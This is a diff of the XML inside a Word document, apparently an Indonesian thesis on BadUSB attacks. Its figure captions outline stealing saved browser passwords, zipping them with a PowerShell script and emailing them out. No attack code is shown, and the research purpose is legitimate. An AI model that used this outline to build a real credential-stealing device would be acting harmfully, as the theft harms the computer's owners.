+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>File</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> dari Github</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194859 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>41</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194860" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 9</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>. Perintah Menjalankan Program</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194860 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>42</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194861" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 10</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">. Data Kedua </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>Browser</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> Dalam </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>File</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> .txt</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194861 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>42</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194862" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 11</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">. Berhasil Menyalin </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">File </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>.txt</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194862 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>43</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194863" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 12</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>. Baris Perintah Menjalankan zipping.ps1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194863 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>43</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194864" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 13</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">. </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>File</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> Password.zip Berhasil Dibuat</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194864 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>44</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194865" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 14</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>. Baris Perintah Menjalankan maintenance.ps1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194865 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>44</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194866" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 15</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve">. </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>Email</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> Berhasil Dikirimkan</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194866 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>45</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TableofFigures"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc43194867" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Gambar V- 16</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+            <w:lang w:val="id-ID"/>
+          </w:rPr>
+          <w:t>. Baris Perintah Mengakhiri Penyerangan</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc43194867 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>45</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -8991,8 +10499,6 @@
         </w:rPr>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
-      <w:bookmarkStart w:id="21" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9022,27 +10528,27 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc75146106"/>
-      <w:bookmarkStart w:id="23" w:name="_Toc463344421"/>
-      <w:bookmarkStart w:id="24" w:name="_Toc43087395"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc75146106"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc463344421"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc43087395"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Pendahuluan</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="21"/>
       <w:bookmarkEnd w:id="22"/>
       <w:bookmarkEnd w:id="23"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc43087396"/>
+      <w:r>
+        <w:t>Latar Belakang</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="24"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc43087396"/>
-      <w:r>
-        <w:t>Latar Belakang</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9181,7 +10687,7 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Hlk32935731"/>
+      <w:bookmarkStart w:id="25" w:name="_Hlk32935731"/>
       <w:r>
         <w:t xml:space="preserve">Seiring dengan perkembangan sistem operasi Windows, aplikasi </w:t>
       </w:r>
@@ -9194,7 +10700,7 @@
       <w:r>
         <w:t xml:space="preserve"> juga berkembang pesat.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="25"/>
       <w:r>
         <w:t xml:space="preserve"> Berbagai aplikasi </w:t>
       </w:r>
@@ -9213,7 +10719,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="27" w:name="_Hlk32935753"/>
+      <w:bookmarkStart w:id="26" w:name="_Hlk32935753"/>
       <w:r>
         <w:t xml:space="preserve">Aplikasi </w:t>
       </w:r>
@@ -9268,7 +10774,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="27"/>
+      <w:bookmarkEnd w:id="26"/>
       <w:r>
         <w:t xml:space="preserve"> Salah satu fitur yang dimiliki oleh </w:t>
       </w:r>
@@ -9326,7 +10832,7 @@
       <w:r>
         <w:t xml:space="preserve"> yang membutuhkan akun pengguna untuk menjalankannya. </w:t>
       </w:r>
-      <w:bookmarkStart w:id="28" w:name="_Hlk32935850"/>
+      <w:bookmarkStart w:id="27" w:name="_Hlk32935850"/>
       <w:r>
         <w:t xml:space="preserve">Pada kenyataannya fitur menyimpan password pada </w:t>
       </w:r>
@@ -9426,7 +10932,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="27"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -9545,11 +11051,11 @@
       <w:r>
         <w:t xml:space="preserve">BadUSB merupakan perangkat USB yang dimanipulasi oleh penyerang, </w:t>
       </w:r>
-      <w:bookmarkStart w:id="29" w:name="_Hlk32936326"/>
+      <w:bookmarkStart w:id="28" w:name="_Hlk32936326"/>
       <w:r>
         <w:t>agar saat terdeteksi oleh komputer target perangkat ini akan dikenali sebagai perangkat antar muka USB biasa, seperti keyboard komputer.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="29"/>
+      <w:bookmarkEnd w:id="28"/>
       <w:r>
         <w:t xml:space="preserve"> Bentuk serangan dari BadUSB semakin beragam pada saat ini yang meliputi USBdriveby, Evilduino, </w:t>
       </w:r>
@@ -9767,11 +11273,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="30" w:name="_Toc43087397"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc43087397"/>
       <w:r>
         <w:t>Rumusan Masalah</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="30"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9908,11 +11414,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="31" w:name="_Toc43087398"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc43087398"/>
       <w:r>
         <w:t>Tujuan Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="31"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10055,11 +11561,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="_Toc43087399"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc43087399"/>
       <w:r>
         <w:t>Manfaat Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="32"/>
+      <w:bookmarkEnd w:id="31"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10174,11 +11680,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc43087400"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc43087400"/>
       <w:r>
         <w:t>Batasan Masalah</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="33"/>
+      <w:bookmarkEnd w:id="32"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10330,11 +11836,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="_Toc43087401"/>
+      <w:bookmarkStart w:id="33" w:name="_Toc43087401"/>
       <w:r>
         <w:t>Sistematika Penulisan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="34"/>
+      <w:bookmarkEnd w:id="33"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -10529,12 +12035,12 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="35" w:name="_Toc43087402"/>
+      <w:bookmarkStart w:id="34" w:name="_Toc43087402"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Kajian Teori</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="35"/>
+      <w:bookmarkEnd w:id="34"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -10545,7 +12051,7 @@
           <w:iCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="36" w:name="_Toc43087403"/>
+      <w:bookmarkStart w:id="35" w:name="_Toc43087403"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -10554,7 +12060,7 @@
         </w:rPr>
         <w:t>Microcontroller</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="36"/>
+      <w:bookmarkEnd w:id="35"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10885,7 +12391,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc43087404"/>
+      <w:bookmarkStart w:id="36" w:name="_Toc43087404"/>
       <w:r>
         <w:rPr>
           <w:iCs/>
@@ -10893,7 +12399,7 @@
         </w:rPr>
         <w:t>Arduino</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="37"/>
+      <w:bookmarkEnd w:id="36"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11260,7 +12766,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="38" w:name="_Toc43087405"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc43087405"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -11270,7 +12776,7 @@
       <w:r>
         <w:t>rduino Intergated Development Environment (IDE)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="38"/>
+      <w:bookmarkEnd w:id="37"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11438,7 +12944,7 @@
           <w:i/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="39" w:name="_Toc43087406"/>
